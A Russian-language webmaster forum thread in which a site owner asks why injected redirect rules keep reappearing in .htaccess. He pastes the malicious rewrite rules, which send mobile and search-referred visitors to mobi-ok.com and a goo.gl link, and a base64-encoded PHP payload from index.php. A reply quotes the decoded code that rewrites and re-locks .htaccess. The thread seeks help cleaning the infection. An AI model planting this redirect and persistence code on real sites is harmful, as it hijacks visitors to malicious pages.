Вредоносный код вписывает редирект в .htaccsess

(Ответов: 3, Просмотров: 770)
  1. Banned
    • Регистрация: 26.05.2011
    • Сообщений: 380
    • Репутация: 34
    • Webmoney BL: ?
    1.абсолютно все файлы index.php и .htaccess сейчас с правами 444, при смене прав они сами снова меняются обратно без моего вмешательства. Как этого избежать?
    2. в файлах .htaccess такой код, как удалю снова появляется:

    редирект

    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
    RewriteCond %{HTTP_ACCEPT} 'text/vnd.wap.wml|application/vnd.wap.xhtml+xml' [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
    RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
    RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
    RewriteCond %{HTTP_USER_AGENT} !unix [NC]
    RewriteCond %{HTTP_USER_AGENT} !macos [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
    RewriteCond %{HTTP_USER_AGENT} !google [NC]
    RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
    RewriteCond %{HTTP_USER_AGENT} !bot [NC]
    RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
    RewriteCond %{HTTP_USER_AGENT} !msn [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
    RewriteCond %{HTTP_USER_AGENT} !maui [NC]
    RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ http://mobi-ok.com/l=3241101b056e0b4...5820095d450a6e [L,R=302]

    RewriteEngine on
    RewriteCond %{HTTP_REFERER} ^http://(www\.)?google\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://go\.mail\.ru/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://(www\.)?yandex\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://(www\.)?vk\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://(www\.)?ya\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://(www\.)?ask\.(ru|com|kz|com|ua|com\.ua)/.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} ^http://googleads\.g\.doubleclick\.net/.*$ [NC]
    RewriteRule ^(.*)$ http://goo.gl/AJwPg [R=302,L]
    [свернуть]


    3. в файлах index.php такой:

    evake base 64

    aW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAwKTsKZXJyb3JfcmVwb3J0aW5nKDApOwoKJE1haW5lVVJsID0gJ2h0dHA6Ly9tb2JpLW9rLmNvbS9sPTMyNDExMDFiMDU2ZTBiNGQwMzU2NTcxNDU2NGYwZTU4MjAwOTVkNDUwYTZlJzsKJE1haW5IdGFjY2VzcyA9IAoiClJld3JpdGVFbmdpbmUgb24KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFjcyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbGF2IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFsY2EgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYW1vaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhdWRpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFzdGUgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYXZhbiBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBiZW5xIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJpcmQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYmxhYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBibGF6IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJyZXcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gY2VsbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBjbGRjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGNtZC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gZGFuZyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBkb2NvIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGVyaWMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaGlwdCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBpbm5vIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwYXEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gamF2YSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBqaWdzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGtkZGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0ga2VqaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBsZW5vIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxnLWMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGctZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBsZy1nIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxnZS0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWF1aSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtYXhvIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1pZHAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWl0cyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtbWVmIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vYmkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW90LSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtb3RvIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG13YnAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbmVjLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBuZXd0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG5va2kgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gb3B3diBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwYWxtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBhbmEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGFudCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwZHhnIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBoaWwgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGxheSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwbHVjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBvcnQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcHJveCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBxdGVrIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHF3YXAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2FnZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzYW1zIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNhbnkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2NoLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzZWMtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNlbmQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2VyaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzZ2gtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNoYXIgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2llLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzaWVtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNtYWwgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc21hciBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzb255IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNwaC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc3ltYiBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB0LW1vIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHRlbGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdGltLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB0b3NoIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHRzbS0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdXBnMSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB1cHNpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHZrLXYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdm9kYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3M2NzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdhcC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXBpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdhcHAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwciBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3ZWJjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdpbncgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2ludyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB4ZGEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0geGRhLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB1cC5icm93c2VyIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwLmxpbmsgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2luZG93cy5jZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBpZW1vYmlsZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtaW5pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1tcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzeW1iaWFuIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1pZHAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlQYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaVBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwb2QgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaVBvZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwb2NrZXQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW9iaWxlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFuZHJvaWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gQW5kcm9pZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwZGEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gUFBDIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IFNlcmllczYwIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IE9wZXJhLk1pbmkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gTW9ieSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBNb2JpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX0FDQ0VQVH0gJ3RleHQvdm5kLndhcC53bWx8YXBwbGljYXRpb24vdm5kLndhcC54aHRtbCt4bWwnIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICF3aW5kb3dzLm50IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFic2QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXgxMSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhdW5peCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWFjb3MgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIW1hY2ludG9zaCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhcGxheXN0YXRpb24gW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWdvb2dsZSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAheWFuZGV4IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFib3QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWxpYnd3dyBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbXNuIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhbWVyaWNhIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhdmFudCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhZG93bmxvYWQgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWZkbSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWF1aSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhd2VibW9uZXkgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXdpbmRvd3MtbWVkaWEtcGxheWVyIFtOQ10KUmV3cml0ZVJ1bGUgXiguKikkICRNYWluZVVSbCBbTCxSPTMwMl0KClJld3JpdGVFbmdpbmUgb24KUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9IF5odHRwOi8vKHd3d1wuKT9nb29nbGVcLihydXxjb218a3p8dWF8Y29tXC51YSkvLiokIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9IF5odHRwOi8vZ29cLm1haWxcLnJ1Ly4qJCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9SRUZFUkVSfSBeaHR0cDovLyh3d3dcLik/eWFuZGV4XC4ocnV8Y29tfGt6fHVhfGNvbVwudWEpLy4qJCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9SRUZFUkVSfSBeaHR0cDovLyh3d3dcLik/dmtcLihydXxjb218a3p8dWF8Y29tXC51YSkvLiokIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9IF5odHRwOi8vKHd3d1wuKT95YVwuKHJ1fGNvbXxrenx1YXxjb21cLnVhKS8uKiQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfUkVGRVJFUn0gXmh0dHA6Ly8od3d3XC4pP2Fza1wuKHJ1fGNvbXxrenxjb218dWF8Y29tXC51YSkvLiokIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9IF5odHRwOi8vZ29vZ2xlYWRzXC5nXC5kb3VibGVjbGlja1wubmV0Ly4qJCBbTkNdClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vZ29vLmdsL0FKd1BnIFtSPTMwMixMXQoiOwoJCgkkTXlLZXl2b3JkID0gJE1haW5lVVJsOwogICAgJG1QYXRoID0gcGF0aGluZm8oJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKTsKICAgICRuYW1lRmlsZXMgPSAgJG1QYXRoWydkaXJuYW1lJ10uJy8uaHRhY2Nlc3MnOwoJJFN0YXJIdGFjY2VzcyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRuYW1lRmlsZXMpOwoJcHJlZ19tYXRjaCgnLyg/PD1SZXdyaXRlUnVsZSkuKig/PVxbTFwsUlw9MzAyXF0pLycsJFN0YXJIdGFjY2VzcywgJG1hdGNoZXMpOwoJJHByb3ZlcmthID0gc3RycG9zKCRtYXRjaGVzWzBdLCAkTXlLZXl2b3JkKTsKCgoJaWYgKCRwcm92ZXJrYSA9PT0gZmFsc2UpIHsKICAgICAgICBjaG1vZCgkbmFtZUZpbGVzLDA2NjYpOwoJCSROZXdIdGFjY2VzcyA9ICRNYWluSHRhY2Nlc3MuICJcclxuIiAuJFN0YXJIdGFjY2VzczsKCQkkZnAgPSBmb3BlbigkbmFtZUZpbGVzLCAidyIpOwoJCWZ3cml0ZSgkZnAsICROZXdIdGFjY2Vzcyk7CgkJZmNsb3NlKCRmcCk7Cgl9IGVsc2UgewoJCWNobW9kKCRuYW1lR
    [свернуть]
    • -1
  2. Гуру Аватар для ohmygod
    • Регистрация: 30.04.2011
    • Сообщений: 1,064
    • Репутация: 268
    • Webmoney BL: ?
    Цитата Сообщение от romer Посмотреть сообщение
    2. в файлах .htaccess такой код, как удалю снова появляется:
    Это делает код в index.php

    Развернуть текст

    Код:
    if ($proverka === false) {
    chmod($nameFiles,0666);
    $NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;
    $fp = fopen($nameFiles, "w");
    fwrite($fp, $NewHtaccess);
    fclose($fp);
    } else {
    chmod($nameFiles,0444);
